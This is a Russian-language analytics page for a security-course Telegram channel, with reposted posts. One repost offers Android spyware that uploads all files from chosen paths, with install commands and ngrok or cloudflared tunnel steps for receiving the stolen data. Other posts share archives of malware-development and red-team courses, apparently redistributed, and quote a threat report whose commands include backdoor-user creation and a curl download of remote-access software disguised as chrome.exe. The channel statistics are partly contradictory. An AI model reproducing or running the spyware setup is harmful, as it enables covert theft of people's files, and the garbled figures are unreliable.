ru
Feedback
All Security Engineering Courses

All Security Engineering Courses

Открыть в Telegram

This channel is being updated often with older than 2020 courses, ebooks, videos, code, etc. to be used responsibly by everyone in CyberSecurity in an ethical manner. Lots of content is being downloaded from other channels or forwarded here. Bookmark me!

Больше

📈 Аналитический обзор Telegram-канала All Security Engineering Courses

Канал All Security Engineering Courses (@allsecurityengineeringcourses) языкового сегмента Английский является активным участником. Сейчас сообщество объединяет 19 216 подписчиков, занимая 6 651 место в категории Технологии и приложения и 34 061 место в регионе Россия.

📊 Показатели аудитории и динамика

С момента создания невідомо проект демонстрирует стремительный рост, собрав аудиторию из 19 216 подписчиков.

Согласно последним данным от 19 сентября, 2026, канал показывает стабильную активность. За последние 30 дней изменение числа участников составило 99, а за последние 24 часа — 0, при этом общий охват остаётся высоким.

  • Статус верификации: Не верифицирован
  • Уровень вовлечённости (ER): Средний показатель вовлечённости аудитории составляет 16.35%. В первые 24 часа после публикации контент обычно набирает N/A% реакций от общего числа подписчиков.
  • Охват публикаций: В среднем каждый пост получает 0 просмотров. В течение первых суток публикация набирает 0 просмотров.
  • Реакции и взаимодействия: Аудитория активно поддерживает контент: среднее количество реакций на один пост — 0.
  • Тематические интересы: Контент сосредоточен на ключевых темах, таких как git, strace, github, linux, docker.

📝 Описание и контентная политика

Автор описывает ресурс как площадку для выражения субъективного мнения:
This channel is being updated often with older than 2020 courses, ebooks, videos, code, etc. to be used responsibly by everyone in CyberSecurity in an ethical manner. Lots of content is being downloaded from other channels or forwarded here. Bookmar...

Благодаря высокой частоте обновлений (последние данные получены 20 сентября, 2026) канал поддерживает актуальность и высокий уровень охвата публикаций. Аналитика показывает, что аудитория активно взаимодействует с контентом, что делает его важной точкой влияния в категории Технологии и приложения.

19 216
Подписчики
Нет данных24 часа
+287 дней
+9930 дней
Архив постов
@WickHelps-ntroduction Windows Malware Development.rar1282.35 MB

Repost from N/a
Simple Android spyware that uploads all files from user selected paths. pkg update && pkg upgrade -y pkg install git pv unzip
Simple Android spyware that uploads all files from user selected paths.
pkg update && pkg upgrade -y
pkg install git pv unzip -y
git clone http://github.com/7wp81x/Spim3
cd Spim3/
bash spim3.sh

Example usage:

- open new session
cd Files/
php -S 127.0.0.1:8000 > /dev/null 2>&1 &

- Tunnel using cloudflared
cloudflared tunnel --url 127.0.0.1:8080

- Tunnel using ngrok
ngrok http 8080

- on main session:

bash spim3.sh

- Enter the url from ngrok/cloudflare.
- Enter paths, if done then Enter done.
- Compile /sdcard/Spim3/decompiled Using apktool_M
Termux tools are for educational use only. For more information about this tool, visit the GitHub link.

Repost from N/a
Antisyphon: Offensive Development w/ Greg Hatcher & John Stigerwalt
Antisyphon: Offensive Development w/ Greg Hatcher & John Stigerwalt

HackTricks - AWS Red Team Expert (ARTE).part01.rar1996.80 MB

Offensive Development w Greg Hatcher & John Stigerwalt.rar3250.61 MB

https://xakep.ru/2011/12/06/57950/ SQLMap - SQL Injections are easy

https://trivy.dev/v0.17.2/ A Simple and Comprehensive Vulnerability Scanner for Containers and other Artifacts, Suitable for CI.

US companies letting go of US employees!
US companies letting go of US employees!

So that was a lie
So that was a lie

This repo contains information about EDRs that can be useful during red team exercise. https://github.com/Mr-Un1k0d3r/EDRs/ #статьи_ссылки_scripts

After establishing an initial connection, SCATTERED SPIDER executed the ping command against several domains within and outside of the target organization, likely to identify their level of access and visibility within the network. The adversary then ran several variations of the nltest command to identify domain controllers (DCs) of interest and the wmic command to identify programs currently installed on the host. Finally, the adversary established persistence by creating a new user on the host and attempting to download FleetDeck remote access software. nltest /dclist:<domain> nltest /domain_trusts wmic product get name, version net user [Redacted-Username] [Redacted-Password] curl -L hxxps://agent.fleetdeck[.]io/M9zydGyGHrUXkhZeB9mj4?win -o chrome.exe